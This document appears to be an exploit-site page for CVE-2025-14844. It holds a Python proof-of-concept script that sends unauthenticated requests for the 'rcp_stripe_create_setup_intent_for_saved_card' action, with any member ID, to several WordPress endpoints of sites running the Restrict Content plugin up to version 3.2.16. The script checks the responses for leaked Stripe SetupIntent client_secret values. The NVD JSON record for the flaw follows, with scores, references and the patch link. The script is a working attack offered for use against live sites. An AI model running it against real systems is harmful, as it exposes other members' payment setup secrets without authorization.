CVE-2025-14844

import requests import json # CVE-2025-14844 PoC - Unauthenticated Stripe SetupIntent Secret Leak # Target: WordPress site with Restrict Content plugin <= 3.2.16 def exploit_cve_2025_14844(target_url, member_id): """ Exploit for Missing Authentication in rcp_stripe_create_setup_intent_for_saved_card This PoC demonstrates how an unauthenticated attacker can leak Stripe SetupIntent client_secret """ # The vulnerable endpoint is typically the WordPress REST API or admin-ajax.php endpoints = [ f"{target_url}/wp-json/restrict-content/v1/stripe/setup-intent", f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-admin/admin-post.php" ] # Construct the exploit payload # The vulnerable function expects member_id and potentially user-controlled key payload = { 'action': 'rcp_stripe_create_setup_intent_for_saved_card', 'member_id': member_id, # Target any membership user ID # Additional parameters may be needed based on plugin version } print(f"[*] Targeting: {target_url}") print(f"[*] Targeting member ID: {member_id}") for endpoint in endpoints: try: print(f"\n[*] Trying endpoint: {endpoint}") if 'admin-ajax.php' in endpoint: response = requests.post(endpoint, data=payload, timeout=10) else: response = requests.post(endpoint, json=payload, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") # Check if we got a SetupIntent client_secret in response if 'client_secret' in response.text.lower() or 'seti_' in response.text: print("[+] VULNERABLE! Stripe SetupIntent client_secret may have been leaked") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False # Example usage if __name__ == "__main__": import sys if len(sys.argv) > 2: target = sys.argv[1] member = sys.argv[2] exploit_cve_2025_14844(target, member) else: print("Usage: python cve-2025-14844.py <target_url> <member_id>") print("Example: python cve-2025-14844.py https://example.com 1")

{"cve": {"id": "CVE-2025-14844", "sourceIdentifier": "[email protected]", "published": "2026-01-16T10:16:04.330", "lastModified": "2026-01-23T17:09:18.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Membership Plugin – Restrict Content plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 3.2.16 via the 'rcp_stripe_create_setup_intent_for_saved_card' function due to missing capability check. Additionally, the plugin does not check a user-controlled key, which makes it possible for unauthenticated attackers to leak Stripe SetupIntent client_secret values for any membership."}, {"lang": "es", "value": "El plugin Membership Plugin – Restrict Content para WordPress es vulnerable a Autenticación Faltante en todas las versiones hasta la 3.2.16, inclusive, a través de la función 'rcp_stripe_create_setup_intent_for_saved_card' debido a la falta de verificación de capacidad. Además, el plugin no verifica una clave controlada por el usuario, lo que hace posible que atacantes no autenticados filtren valores client_secret de Stripe SetupIntent para cualquier membresía."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liquidweb:restrict_content:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.2.17", "matchCriteriaId": "4029F83A-38F5-4132-92F3-E0639BEF0DE4"}]}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/639.html", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://docs.stripe.com/api/setup_intents/object", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L848", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L987", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3438168/restrict-content/tags/3.2.17/core/includes/gateways/stripe/functions.php", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c28545d-c7cd-469f-bccf-90e8b52fd4e7?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}